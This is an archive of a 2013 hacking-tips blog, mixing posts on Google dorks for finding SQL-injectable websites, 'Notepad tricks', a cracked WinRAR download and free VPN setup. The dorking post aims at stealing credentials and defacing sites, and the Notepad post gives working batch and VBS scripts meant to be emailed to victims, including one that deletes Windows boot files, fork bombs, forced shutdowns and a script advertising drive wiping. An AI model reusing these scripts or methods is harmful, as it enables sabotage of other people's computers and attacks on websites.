Monday, 12 August 2013

Finding SQL Vulnerable Sites Easily


   Hello friends ,
                    Today am gonna help you to find SQL Vulnerable in Websites , so let me tell you what is SQL injection first.


SQL injectionSQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

I - Intro :

What you need to know is that 95% of the websites are vulnerable. That's why you need to improve your searching methods, to get better that the rest of the hackers. A scanner may help you, but it will never remplace your brain and often, you're much better than it to find vulnerabilities fast and easy.. We're gonna now speak about useful things to

A - The common google dorks

Search on the sub-domains : site:1.com
Search ONLY on the principal domain : site:www.1.com
Search in the URL : inurl: / allinurl:
Search for a specific file extension : filetype:
Search in the text : intext: / allintext:
Search in the title : intitle:
Search for a domain extension : site:* (fr/gov/mil/edu/org/..)

B - Web file extensions

Common web files extensions where fails are localized : PHP ; CFM ; HTM/HTML ; ASP ; ASPX .

All the other webfiles extensions where a fail may comes up (if you are lucky) : ASMX ; SWF ; DO ; PDF ; SEAM...

Note : Sometimes, you will have an URL like this : http://website.gov/?id=1
It may be vulnerable too but that's extremly rare.

C - Variables

Variables are necessary for SQL injections. Common ones are : id= ; pid= ; file= ; lang= ; pageid= ; path= ; rub= ; option= ; task=

D - What Search engine/Broswer should i use ?

Google, of course. Also, you must know that firefox is, for me, the more convenient to search SQL fails : fast and effective.

II - Become a pro :

First, it might sound stupid but you need to write very fastly. The hacker who don't will spent many time and then, abandons. In fact, a good thing to do is to open something like 5 tabs and use all what
you know about dorks and file extensions. I suggest you, when you are looking for SQL vulns, to search ONLY on ONE website : when you have a fail, that's good, but if you have a fail on your selected
website, that's better.
Here's is an example ;

Tab 1 - site:1.com inurl:cfm?id=
Tab 2 - site:www.1.com inurl:cfm?
Tab 3 - site:1.com inurl:php? inurl:id
Tab 4 - site:www.1.com inurl:asp
Tab 5 - site:1.com inrul:aspx?id

Note : instead of site:1.com , you can do site:*.1.com
Note 2 : You can do this with only 1 tab too, but you need to be really fast - e.g. If you don't have any results, go back immedialty to the previous page and change the dorks.

90% of the time while using this method, i find an SQL vulnerability on the website of my choice in few minutes.

III - A smart trick to use :

When you don't know which type of web file the vuln will infect, you can search by using only the variable.
Example :

inurl:id=1
inurl:lang=1

If you're good, you will get loads of good results with this dork.

IV - A special one

Okay, first it's not a common method, it don't works many times ; Sometimes, try to create a variable.
Example : http://site.gov/staff/graph.php
What yo do : http://site.gov/staff/graph.php?id=1

Why does it may work ? Because ID is a really used variable. So, when you have created it, you can try to inject.

    In my next post i will show you how to use Havij to hack a website so stay tuned .. :)


Friday, 9 August 2013

How To Use Gmail In Offline

Using the Gmail in Offline is made simple with a wonderful Gmail Offline app ..

Using the mail in offline lets you to access your E-Mails in your Gmail with full control. You can get the app for free from Chrome Store. With one click you can install this Gmail Offline App by sign-in into Chrome with your Gmail account.



To add the Gmail Offline to your Chrome follow the below steps
Go the this link Google Gmail Offline App from your Google Chrome Browser : 
 Offline app

1) As soon as you enter to Google Chrome's Apps market you will be allowed to sign-in with you Google Email ID.
2) After Signing into the Google Chrome you will be allowed to Install the App on your chrome Browser by hitting on "Add to Chrome" (Please wait for some time to install the app on your Chrome Browser).
3) After installing the Google Gmail Offline app on your chrome browser you will be able to see you emails on your chrome browser even when your are on offline connection i.e with out internet connection
4)The User Interference of the Google Gmail Offline Apps is not same as Actual Gmail Interference. Of-course the user interference of this app is so easy to navigate and access all the option on your computer with out Internet Connection.
5) You can also compose the email from your offline gmail app in offline connection and the composed app deliverers to the as soon as your computer is connected to Internet.

And you need not to worry about the Security Issues as this app is developed by Google Itself.
 

Saturday, 3 August 2013

Tricks using Notepad

    Ever wondered that a small application like NOTEPAD would be used to hack a system..  So guess what its TRUE , you can .
    P.S :  Try these methods on your OWN RISK , both the admin and the blog site is not responsible for your actions .

How to make cool matrix batch file using notepad :

1. Go to start--> Select Notepad -->Open the Notepad and then Enter
 the below code into the notepad

Code:
        @echo off
       color 2
       :start
       echo %random% %random% %random% %random%
       %random% %random% %random% %random%
       %random% %random% %random% %random%
       goto start





   2. Save the file as .bat file Extension  and note in the below screen shot. i forgoted to insert last sentence (goto start) so if your forgot to insert this goto start sentence in the last  of the code so when you try to see the output then the you cannot see the output properly.




   3.Double click on file That you have saved  and it will open the matrix file like shown below scren shot







 


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Make Your Keyboard Type (Any) Message Continuously-VBS Trick :

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.


Code :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.



Code :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Make a Personal Diary(Log) with Notepad (Easter Eggs):

Notepad Diary
Notepad Diary
You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note.

Code:
      1) open Notepad and type .LOG in capital letters and press Enter.
      2) Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note.
      3) Just enter your note and save the file each time after making an entry.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Lock Files Using Notepad

Code:

if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTEPAD COLORS:

Code :
 
Notepad colors
COPY THIS Code:
@echo off
:A
color 4
pause
color 1
pause
color 2
pause
color 3
pause
color 4
pause
color 5
pause
color 6
pause
color 7
pause
color 8
pause
color 9
goto A 

NOW SAVE IT AS A .BAT FILE (explame:  color.bat  )
Open it and hold space. See the amazing colors changing whilst holding space





-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

USE NOTEPAD TO CHECK IF YOUR ANTIVIRUS IS WORKING :

Code :
 
1. Open Notepad.
2.Now Copy this code in the text file….
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Then save it with the name fakevirus.exe

Now, If the File got Detected Immediately .. It means your Antivirus is working Properly.
 
Info : This test virus was developed by the European Institute for Computer Anti-Virus Research (EICAR) to provide an easy (and safe!) way to test whether your anti-virus software is working, and see how it reacts when a virus is detected. It is supported by most leading vendors, such as IBM, McAfee, Sophos, and Symantec/Norton.



-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

MAKE CONTINIOUS DIALOG BOX APPEAR HUNDREDS OF TIMES (NOTE HARMLESS AND NOT PERM WHEN YOU RESTART PC IT WILL GO AWAY) :

Code :
 
1.OPEN NOTEPAD
2.COPY AND PASTE THIS CODE TO NOTEPAD
Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2

:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1
3.SAVE IT AS A .BAT FILE
4.SEND IT TO A FRIEND VIA EMAIL AND PRANK THEM
5.ENJOY

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to crash a PC Forever :

Code :
 
1) OPEN NOTEPAD
2) COPY AND PASTE THIS CODE
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3) SAVE IT AS A .BAT FILE
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER – DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
SO SEND THIS TO YOUR WORST ENEMY  VIA EMAIL….REPEAT DO NOT CLICK THE FILE YOURSELF!!!!!!
ENJOY!!
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to create a fake virus that shutdown computer using Notepad  :

Code :
 
1. OPEN NOTEPAD
2. COPY THIS CODE AND PASTE IT TO NOTEPAD
@echo off
msg * u r terminated
shutdown -c “stop me if you can” -s
3. SAVE IT AS A .BAT FILE…..WHEN IT OPENS YOUR COMPUTER WILL SHUTDOWN
4. SEND IT TO YOUR FRIEND VIA EMAIL AND PRANK THEM


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to create your own website using Notepad  :

Code :
 
1. OPEN NOTEPAD
2.TYPE IN HTML CODES-   <doctype html>
<html>
<body>
<h>THIS IS THE HEADING<h>
<p>THIS IS THE PARAGRAPH<p>
<body>
<html>

3. SAVE IT AS A .HTML FILE
4. OPEN IT UP AND YOU HAVE CREATED YOUR PERSONAL WEBSITE!!!!!!
5. HAVE FUN

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to get fake error message??????? :

Picture   
Code :
  • Open Notepad
  • Type in: msg * Error: Your system is affected by virus
  • Save as "virus.bat"
  • Now open that .bat file, now you got error message window
  • Its not virus, just your assumption message.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Pranks ::::

 

1) File.bat :

Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.

1. Go into Notepad

2. Type the text below.

 @echo off
md hello
:A
start hello
goto A


3. Save it as file.bat

2) Delete.bat

Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

1. Go into Notepad.
2. Enter the text below into notepad
 @echo off
echo do you want to delete all of your computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost -n 2 > nul
echo Are you sure you want to delete all computer data? (y/n)
pause >nul
echo deleting all data...
echo.
echo.
pause localhost -n 2 > nul
dir /s
echo.
echo.
ping localhost -n 2 > nul
cls
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
pause
echo.
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del "c:delete.bat"


3. Save this as delete.bat (MUST NAME IT THIS!)


3) virus.bat :

Description: The prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it.

1. Go into Notepad
2. type
start virus.bat
virus.bat
(exactly like that!)


3. Save it as virus.bat (must be .bat)


4) shutdown.bat :

Description: This makes your friend think that his/her computer has a virus then their computer shuts down.
1. Go to notepad and type:
@echo off
:A
cls
echo Do you wanna crash your computer? (y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the time reaches zero.
pause
msg * Your computer will crash in...
msg * 5
msg * 4
msg * 3
msg * 2
msg * 1
msg * Good-Bye
msg * You have been pwned! :)
shutdown -s -t 00


2. Now save it as shutdown.bat


5) up.bat :

Description: Shows a fake username and password entrance area then deletes it self
1.Go into notepad and type:

@echo off
echo If the proper username and password is not entered all files will be deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and password wrong
pause
echo Files are being deleted
pause
dir/s
del "c:up.bat"


3. Save it as up.bat (must be this!)
 

6) CD Drive Open and close :

Description: This vbs file will continually open your CD drive


 1. Go into notepad

2. Type the text below

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
3. Save it as cdopen.vbs

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Trick Make Your Computer Speak What You Type!!!!  :

Picture
1.Open Notepad and copy and paste the following code into it.
Dim message, sapi
message=InputBox(“What do you want me to say?”,”Speak to Me”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

2.Now save the notepad file with the name speak.vbs at your desktop.
3.Now double click on speak.vbs Type in the box whatever you want your computer to speak for you.


NOTE: In case if it displays an error message while opening, edit it with notepad and re-type all the quote marks (“)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Toggle Caps Lock button On-Off Continuously :


  • Open Notepad.
  • Copy the following code.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  • Save it as abc.vbs
  • And send it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

 Hit Enter Key Continuously :


  • Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
  • Save it as abc.vbs
  • Now sent it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Hit Backspace Key Continuously :


  • Open Notepad and copy the following code.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  • Save it as abc.vbs and send it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Bush Hid the Facts – Most Popular Notepad Tricks : 

 

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.

Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…

 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


World Trade Centre Attack Trick – Shocking Notepad Tricks :

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33N

Open your Notepad
Type the flight number i.e Q33N in Capital Letters.
Increase the Font Size to 72
Change the Font to Wingdings

You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below)  WTF ?
Must Be Shocking Right.
But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Change The Header/Footer Of Your Notepad File :

 

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.

Open Notepad.
Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Pick Your Option Batch File :

 

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad.

Code :
 
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.

Tuesday, 30 July 2013

WinRAR 5.0 beta 6 fully cracked

Hey guyz,
        In this I will provide you  WinRAR 5.0 beta 6 fully cracked .

 WinRAR is a powerful archive manager. RAR files can usually compress content by 8 percent to 15 percent more than ZIP files can. WinRAR is a powerful compression tool with many integrated additional functions to help you organize your compressed archives.   It can backup your data and reduce size of email attachments, decompress RAR, ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format.

WinRAR - What's new in the latest version

Version 5.00 beta 6

1. Fixed a bug in recovery record generation in RAR 5.0 archive format.
Under certain circumstances previous beta versions could produce wrong recovery record data, inefficient to repair a corrupt archive.
Such invalid recovery record can be identified with "Test" command,which issues "Recovery record is corrupt" warning for it.

 

https://lh3.ggpht.com/-wsPLzGP-9BQ/UdPyx97ZCfI/AAAAAAAAAS4/zooYT42n8lA/s471/winrar.PNG  


                 Download

Unlock micro sd card password

Hey Dudes ,
             In this post we will see how to Unlock micro sd card password on symbian phones only.

Here you go simply follow the steps :

1. First Install FExplorer in your phone memory.
2. Now open FExplorer in your phone.
3. Got to drive C: , you will find a file called mmcstore.
4. Send it to your pc directly and and rename the file.
5.open that file with notepad.
6. At the end of the file you will find your password.



How To Recover Super Hidden Files From Pendrive Using Command Prompt

Hii Buddies ,
         In this post we will see how to recover Super Hidden Files from Pendrive using Command Promp.

       We all mostly use pendrives for carrying data from one computer to another. Your data in pendrive is important to you. Viruses are the biggest problem for the pendrives. Commonly most of the viruses infects through the pendrives. Some of the viruses superhiddens the files and folders in your pendrive and creates a duplicate folder with ".exe" extension.


 

There are some tools to change the attributes of files and folders to normal folders. Now lets us learn resetting super-hidden files to normal attributes.

Basically we can view super hidden files by changing a setting in folder options.

If the Folder Options is not available due to the virus infection. You can reset files/folders in pendrive using command prompt.

Steps :
  • Plugin pendrive to your computer.
  • Note the Drive Letter of your pendrive. Example: H
  • Open Run by pressing Win+R.
  • In Run box type cmd and press Enter.
  • Command prompt will appears. Type the Drive Letter of your pendrive followed by a colon. Example:  H:
  • Next type: attrib -s -h /s /d *.* and Hit Enter.
  • Note: Make sure that there should be a space after every command.


 


Wait for some time until it completes. Now you can see all the files and folders in your pendrive will be at normal state.


Setting up VPN network in your system

Hii friends,
           In my last post I posted how to byepass Fortiguard using VPN , in this I will give you the list of Free VPN's that are available and how to set up this in your system.
There are serveral VPN that are available here i'l give a few of them that you can use.

List of VPN :

1.   VPN for uk     (I prefer this)

2.   UltraVPN

3.   Aloneweb

4.   Freevpn

5.   CyberGhost

6.   Hotspot

7.   Gpass


9.   Its Hidden




     So the above provided sites are top 10 Vpn service sites , now lets see how to set up the VPN in our system( Need ADMINISTRATOR rights to setup this VPN).
    Here i'l be using VPNforUk  which works on most of the country , In this site the Password changes daily so dont forget to look at the Main Page of  VPNforUK site for Password .




Configure Free PPTP VPN in Windows 8 :
  •  Click on “Open Network and Sharing Center” from the network icon from the taskbar or click on “Network and Sharing center” from Control Panel
  • Click on “Set up a new connection or network”
  • Select “Connect to a workplace and click “Next"
  • Choose “Use my Internet Connection (VPN)”
  • In the “Internet Address” field use vpnforuk.com as hostname. In the “Destination name” field type “VPNForUK.COM”
  • Click “Create”
  • Click on the monitor icon on the bottom right-hand corner
  • Right–click on the “VPNForUK.COM” connection, and choose “Properties” from the menu.
  • Select “Security” tab and for “Type of VPN” select “Point to Point Tunneling Protocol (PPTP)”
  • Click “OK”
  • Click again on the monitor icon on the bottom right-hand corner, and click “Connect” to “VPNForUK.COM”
  • In the next fields type “vpnforuk” as VPN username and VPN password found on the main page of VPNfoUK website and finally click “OK”
  • When next to “VPNForUK.COM” is written “Connected” your connection has been created.


Configure PPTP VPN in Windows 7 :
  • From Windows 7 Desktop, click Start – Control Panel to open the control panel
  • Click Network and Internet
  • Click Network and Sharing Center
  • Click Set up a new connection or network, then Connect to a workplace
  • Select option No, create a new cnonection, then Use my Internet connection (VPN)
  • In the Connect to a workplace window, fill VPN Server hostname as shown in VPN web page at format of vpnforuk.com
  • In Next window, use vpnforuk as User name field, and use password found from main page of the website in the Password field
  • Click “Connect” button to start the free VPN connection in your Windows 7 Desktop.


Configure Free PPTP VPN in Windows XP :
  • From Windows XP desktop, click Start – Control Panel to open the control panel
  • Click Network Connections icon, open the Network Connections window
  • Click Next button to get the first “New Connection Wizard” Welcome window
  • Select “Connect to the network at my workspace” in “Network Connection Type” window, click Next
  • Select “Virtual Private Network connection” in “Network Connection” window, click Next
  • Enter VPNForUK.COM as the VPN connection name, click Next
  • Enter VPN Server hostname as shown in VPN web page at format of vpnforuk.com, click Next
  • Click “Finish” button.
  • Now the VPN login window shows up,use vpnforuk as the User name and password found from the main page of the website , click “Connect” button to start your free Win XP VPN connection!


Configure Free PPTP VPN in Mac OS X :
  • From Mac OS X 10.x (Tiger, Leopard, Snow Leopard, Lion or Mountain Lion), click Top Left Apple Icon, then click “System Preferences…” menu item, in opened Window, click “Network” icon
  • In opened Network window, Click on the ‘+’ button at bottom left corner, in the next opened window, input the following, then click “Create” button
  • Interface: VPN
  • VPN Type: PPTP
  • Service Name: VPNForUK.COM
  • In the next window, enter the VPN Server information as shown in our VPN web page at format of vpnforuk.com, use Automatic (128 bit or 40 bit ) for Encryption, then click Apply button
  • Click the Advanced… button and under the Options tab make sure to check Send all traffic over VPN Connection option, click OK button, click Apply button again.
  • Now click Connect button in the middle of the window, from the Internet Connect window, please use vpnforuk in the name field, and use password found from website in the password field, click “OK” button to start your free VPN connection in your Mac OS X desktop!


Configure Free PPTP VPN in Linux Ubuntu :
  • Open Network Manager – From the desktop click on the Network Manager icon in the top right hand corner, click on VPN Connections and Configure VPN. If you can’t see the Network Manager icon, you can open network manager by clicking on System -> Preferences -> Network Configuration and then click on the VPN tab.
  • Add VPN connection – When the VPN Connection window is displayed, click on Add to create the new connection.
  • Choose the connection type – Ensure the connection type is PPTP and click Create.
  • Enter VPN Account Details – For gateway enter “vpnforuk.com” as the VPN server name. In the Connection name field, enter “VPNForUK.COM” as the new connection name, Enter “vpnforuk” as VPN username and Password found form website as VPN password too.
  • Advanced Settings – Select both MSCHAP and MSCHAPv2 options. Check the box labeled Use Point to Point encryption (MPPE) and then click OK. Click OK again to save the VPN connection.
  • Connect to the VPN – Now start the VPN connection by clicking on the Network Manager Icon again, select VPN Connections and click on the new connection you have created.
  • You’re connected! – The Network Manager icon should now have a little padlock icon on it to indicate that the VPN is now connected.




 

Subscribe to our Newsletter

Contact our Support

Email : ajai199@gmail.com